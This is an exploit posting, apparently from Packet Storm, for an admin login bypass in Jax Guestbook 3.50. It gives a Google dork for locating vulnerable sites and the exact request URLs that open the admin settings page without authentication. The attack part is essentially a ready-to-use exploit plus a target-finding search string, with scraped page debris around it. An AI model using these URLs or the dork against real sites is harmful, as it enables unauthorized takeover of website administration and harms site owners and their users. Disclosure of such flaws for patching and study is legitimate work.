Jax Guestbook version 3.50 suffers from a direct access vulnerability that allows for administrative login bypass.
a17d907cf40a6fb15b6e755567027de9f0e8939c8b205a2c88e84c28095aa208-------------------------------------------
>> Jax Guestbook 3.50 Admin Login Exploit
>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.
>> Found by: Sora
>> Contact: vhr95zw [at] hotmail.com
>> Google Dork: "inurl:guestbook.admin.php?action=settings"
We can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.
# Code: https://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>
https://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>
# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed